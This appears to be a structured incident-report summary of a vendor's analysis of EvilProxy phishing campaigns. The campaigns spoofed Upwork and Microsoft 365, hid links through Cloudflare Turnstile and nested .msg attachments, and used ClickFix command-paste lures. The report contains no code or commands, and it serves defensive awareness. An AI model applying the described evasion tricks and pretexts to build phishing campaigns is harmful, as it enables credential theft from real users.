Full Report
During May, Barracuda threat analysts identified several notable email-based threats targeting organizations around the world and designed to evade detection and boost the chances of success.
Analysis Summary
# Incident Report: EvilProxy Phishing Attacks Resurface with Evasive Tactics
## Executive Summary
During May, threat analysts identified an escalated campaign utilizing the EvilProxy Phishing-as-a-Service kit, employing novel evasion techniques like layered attachments and the "ClickFix" social engineering method. The primary goal across campaigns was credential harvesting, targeting Microsoft 365 logins, Upwork user accounts, and executing remote code via user encouragement for hospitality-related scams. Response actions centered on analysis and highlighting defensive tooling capabilities against these evolving email-based threats.
## Incident Details
- Discovery Date: During May
- Incident Date: Throughout May (Ongoing campaign discovery)
- Affected Organization: Various organizations globally (Targets implied across sectors)
- Sector: Various (Finance/Employment via Upwork spoofing, General business services, Hospitality)
- Geography: Worldwide
## Timeline of Events
### Initial Access
- Date/Time: Throughout May
- Vector: Email Phishing (EvilProxy Kit)
- Details: Attacks utilized spoofed logos (Upwork, Microsoft 365 warnings) and layered attachments (.msg files) to deliver malicious links.
### Lateral Movement
*Not explicitly detailed for credential compromise, but presumed acquisition of Microsoft 365 credentials would allow internal network access.* For ClickFix attacks, the ultimate goal was immediate remote code execution on the victim's endpoint.
### Data Exfiltration/Impact
- **Credential Theft:** Harvesting of Microsoft 365 login credentials.
- **Account Takeover:** Access to personal accounts and sensitive data associated with stolen credentials.
- **Endpoint Compromise (ClickFix):** Potential delivery and execution of malicious code (e.g., HTA files/scripts) via user-executed commands.
### Detection & Response
- **Detection:** Identified and analyzed by Barracuda threat analysts.
- **Response:** Analysis of new tactics; reporting findings for defense awareness. (No specific customer-side containment/eradication details provided in the source beyond vendor capabilities).
## Attack Methodology
- **Initial Access:** Phishing emails utilizing EvilProxy kit, employing sophisticated social engineering (Upwork payment notifications, fake M365 security alerts, invoice scams).
- **Persistence:** Not explicitly detailed for the initial credential harvesting phase, but captured M365 credentials grant access viability.
- **Privilege Escalation:** Stealing corporate/M365 credentials effectively bypasses initial perimeter defenses. ClickFix methods allow local command execution.
- **Defense Evasion:**
* **Cloudflare Turnstile:** Used in invoice scams to verify human users and bypass automated security checks before directing to the final phishing site.
* **Layered Attachments:** Using a `.msg` file containing an image that links out, increasing steps away from the initial email gateway.
* **Varied Subject Lines:** Using multiple subject lines for M365 alerts to maintain campaign continuity after one subject line is blocked.
- **Credential Access:** Fake Microsoft 365 login pages and fake Upwork verification pages designed to capture credentials.
- **Discovery:** Low-level reconnaissance likely involved in crafting legitimate-looking requests (e.g., payment notifications, reservation issues).
- **Lateral Movement:** Implied via stolen M365 credentials, but not specifically detailed.
- **Collection:** Credentials are the primary collected data.
- **Exfiltration:** Credentials are sent back to attacker-controlled infrastructure.
- **Impact:** Account compromise and potential remote code execution (via ClickFix).
## Impact Assessment
- **Financial:** Not quantified, but tied to potential costs of M365 recovery and data breach remediation.
- **Data Breach:** User login credentials (Microsoft 365, potentially Upwork associated data).
- **Operational:** Potential operational disruption due to M365 account lockouts or compromise.
- **Reputational:** Damage to trust associated with platforms being spoofed (Upwork, Microsoft).
## Indicators of Compromise
*Note: Specific IOCs were not provided in a defanged format in the source text, as the report focuses on analysis rather than mitigation across specific customer endpoints.*
- **Network indicators:** Malicious links directing toward Cloudflare Turnstile verification pages followed by attacker-controlled phishing domains. (Domains/IPs were dynamic and not extracted/defanged).
- **File indicators:** Use of `.msg` attachments potentially containing executable or remote content links.
- **Behavioral indicators:** User clicks a link purporting to be for payment verification, completes an intermediary 'bot check,' and subsequently enters credentials on a fake login page. ClickFix behavior involves users copying and pasting commands into Windows dialog boxes.
## Response Actions
- **Containment:** Not specified based on the high-level analysis report. (Implied action for affected organizations would be credential resets and session invalidation).
- **Eradication:** Not specified.
- **Recovery:** Not specified.
## Lessons Learned
- Phishing-as-a-Service (PhaaS) providers like EvilProxy are rapidly innovating to defeat standard email security tools (evident in the use of Cloudflare Turnstile and layered attachments).
- Social engineering methods previously associated with nation-state actors (ClickFix) are being adopted by criminal groups, increasing the risk posed by direct command execution initiated by the user.
- Attackers are diversifying pretext across multiple high-trust scenarios (employment payments, system security alerts, invoice processing).
## Recommendations
- Implement advanced email protection capable of deep link inspection, including handling redirection chains and bot-verification mechanisms (like Cloudflare Turnstile).
- Enhance Security Awareness Training to specifically address newer social engineering techniques like the ClickFix method, emphasizing extreme caution regarding copying and pasting commands.
- Require MFA/Passwordless authentication on all critical accounts, especially Microsoft 365, to mitigate the effectiveness of harvested credentials.
- Thoroughly investigate and block any identified malicious domains/IPs related to the observed phishing infrastructure.